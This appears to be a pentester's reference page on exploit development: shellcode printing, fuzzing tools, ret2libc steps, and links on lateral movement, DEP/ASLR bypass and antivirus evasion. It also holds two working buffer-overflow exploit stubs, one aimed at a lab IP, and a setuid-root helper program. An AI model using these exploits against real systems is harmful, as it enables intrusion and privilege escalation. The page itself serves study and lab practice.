Exploits and shellcoding

Quick Reference

• Hexdump (python format): hexdump -v -e '"\\""x" 1/1 "%02x" ""' example.exe
• Print hex encoded string in text: printf $(cat file.txt | tr -d '\n')
• Passing binary data as arguments: command $(python -c 'print ...')
• Passing binary data as standard input: python -c 'print ...' | command
• Use file as input and then read from standard input: cat file - | command python -c 'print ...' | cat file - | command
• Cross compile with - mingw32

  i586-mingw32msvc-gcc a.c
  wine a.exe
  

  export file=shell
  i686-w64-mingw32-gcc -c -O3 -march=i686 $file.c
  i686-w64-mingw32-gcc $file.o -o $file.exe -O3 -march=i686 -Wl,-lws2_32
  /usr/i686-w64-mingw32/bin/strip $file.exe
  

• Printing shell code

  (Bash) echo -e '\x31\xc0\x50\x68\x2f...'
  (Python) python -c 'print "\x31\xc0\x50\x68\x2f..."'
  (Perl) perl -e 'print "\x31\xc0\x50\x68\x2f..."'
  

Fuzzing

Tools

• American fuzzy lop is a security-oriented fuzzer: http://lcamtuf.coredump.cx/afl/
• A fork of AFL for fuzzing Windows binaries: https://github.com/googleprojectzero/winafl
  • Using WinAFL to Fizz WinRar (unacev2.dll): https://research.checkpoint.com/extracting-code-execution-from-winrar/
• FoRTE-Research's Fuzzing Benchmarks: https://github.com/FoRTE-Research/FoRTE-FuzzBench

Buffer Overflow

Introductions

• Buffer Overflow Attack - Computerphile: https://www.youtube.com/watch?v=1S0aBV-Waeo
• Binary Exploitation - Buffer Overflow Explained in Detail: https://0xrick.github.io/binary-exploitation/bof1/

Tools - Detection / Testing: - Program to detect the existence of remote / local stack-based buffer-overflow vulnerabilities (FTP, IMAP, POP3 and SMTP): https://github.com/iricartb/buffer-overflow-vulnerability-services-tester-tool - https://hakin9.org/bovstt-buffer-overflow-vulnerability-services-tester-tool/

Techniques

• ret2libc
  • Find libc address: ​ldd /usr/local/bin/backup
  • Find libc system function: ​readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
  • Find libc exit function: ​readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
  • Find libc /bin/sh reference: ​strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh

Practice

• https://github.com/justinsteven/dostackbufferoverflowgood
• vsftpd backdoor: https://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
• HTB - Octomber: /usr/local/bin/ovrflw

Exploit Stubs

import struct, subprocess

libc = 0xf75e2000
sysOffset = 0x0003a940
sysAddress = libc + sysOffset
exitOffset = 0x0002e7b0
exitAddress = libc + exitOffset
binsh = libc + 0x0015900b

payload = "A" * 512
payload += struct.pack("<I", sysAddress)
payload += struct.pack("<I", exitAddress)
payload += struct.pack("<I", binsh)

attempts = 0

while True:
  attempts += 1
  print "Attempts: " + attempts
  subprocess.call(["/usr/local/bin/vulnerable-binary", "arg1", "arg2", payload])

from pwn import *

shellcode = ""

payload = "A"*28 + p32(0xffffd630) + shellcode
r = remote('10.10.10.34', 7411)
print r.recv(1024)

r.sendline('USER admin')
print r.recv(1024)

r.sendline('PASS ' + payload)
r.interactive()

Simple SUID Binary

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
  setuid(0);
  setgid(0);
  system("id");
  return 0;
}

Lateral Movement

• LATERAL MOVEMENT USING THE MMC20.APPLICATION COM OBJECT: https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
• LATERAL MOVEMENT VIA DCOM: ROUND 2: https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
• LATERAL MOVEMENT USING EXCEL.APPLICATION AND DCOM: https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript: https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/

Defense

DEP

Perform additional checks on memory, to help prevent malicious code from running on a system.

Prevent code execution from data pages, by raising an exception, when execution occurs.

• Windows - Bypass Data Execution Protection (DEP): https://0x00sec.org/t/bypass-data-execution-protection-dep/6988
• Linux - Exploit Mitigation Techniques - Data Execution Prevention (DEP): https://0x00sec.org/t/exploit-mitigation-techniques-data-execution-prevention-dep/4634

ASLR

Randomizes the base addresses of loaded applications, and DLLs, every time the Operating System is booted.

• Bypass Windows Exploit Guard ASR - https://github.com/sevagas/WindowsDefender_ASR_Bypass-OffensiveCon2019

LD_PRELOAD

• Load a custom library and override functions of a program

  g++ test.cpp -std=c++11 -shared -o test.so -fPIC  #PIC=Position independent code
  LD_PRELOAD=test.so ldd ./exampleapp
  

Shellcode

• A small, null-free port binding shellcode for 32-bit versions of Windows: https://code.google.com/archive/p/w32-bind-ngs-shellcode/

Tools

Windows

• SEToolKit ’s Powershell alphanumeric shellcode injector to generate a Meterpreter payload that will bypass Windows Defender
• Shellter - Dynamic shellcode injection tool, and the first truly dynamic PE infector ever created: [Intro] [Pro-features]

Search

• Sploitus - https://sploitus.com/

OS

• w3challs syscall table - https://w3challs.com/syscalls/

Other

• Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions: https://github.com/Veil-Framework/Veil

References

• Memorize the 8086 opcodes
  • https://pbs.twimg.com/media/Bhx3cHdCUAIC96Y?format=png&name=900x900
  • https://mobile.twitter.com/nocsi_/status/440358188492148736
• Heap Exploitation | Playing with chunks!: https://0x00sec.org/t/heap-exploitation-playing-with-chunks/2055
• Heap Exploitation - Fastbin Attack: https://0x00sec.org/t/heap-exploitation-fastbin-attack/3627
• Analysis of public exploits or my 1day exploits: https://github.com/externalist/exploit_playground
• Shellcoding for Linux and Windows Tutorial: http://www.vividmachines.com/shellcode/shellcode.html
• Voltron is an extensible debugger UI toolkit written in Python: https://github.com/snare/voltron
• Reverse Shell from an OpenVPN Configuration File: https://medium.com/tenable-techblog/reverse-shell-from-an-openvpn-configuration-file-73fd8b1d38da

Programming

• EXEC in Many Languages: https://github.com/weaknetlabs/Penetration-Testing-Grimoire/blob/master/Payloads/exec-system-languages.md

Windows Specific

• Modern Windows Userspace Exploitation: https://media.ccc.de/v/35c3-9660-modern_windows_userspace_exploitation
• Zero Day Zen Garden: Windows Exploit Development - Part 0 [Dev Setup & Advice]: http://www.shogunlab.com/blog/2017/08/11/zdzg-windows-exploit-0.html
• Zero Day Zen Garden: Windows Exploit Development - Part 1 [Stack Buffer Overflow Intro]: http://www.shogunlab.com/blog/2017/08/19/zdzg-windows-exploit-1.html
• Zero Day Zen Garden: Windows Exploit Development - Part 2 [JMP to Locate Shellcode]: http://www.shogunlab.com/blog/2017/08/26/zdzg-windows-exploit-2.html
• Zero Day Zen Garden: Windows Exploit Development - Part 3 [Egghunter to Locate Shellcode]: http://www.shogunlab.com/blog/2017/09/02/zdzg-windows-exploit-3.html
• Zero Day Zen Garden: Windows Exploit Development - Part 4 [Overwriting SEH with Buffer Overflows]: http://www.shogunlab.com/blog/2017/11/06/zdzg-windows-exploit-4.html
• Zero Day Zen Garden: Windows Exploit Development - Part 5 [Return Oriented Programming Chains]: http://www.shogunlab.com/blog/2018/02/11/zdzg-windows-exploit-5.html

Persistence

• Maintaining Access Part 1: Introduction and Metasploit Example: https://www.hackingloops.com/maintaining-access-metasploit/

Return oriented programming (ROP)

• 64-bit ROP | You rule ‘em all!: https://0x00sec.org/t/64-bit-rop-you-rule-em-all/1937
• SROP | Signals, you say? (Sigreturn Oriented Programming): https://0x00sec.org/t/srop-signals-you-say/2890

Interesting exploits

• Chrome: https://github.com/marcinguy/CVE-2020-15999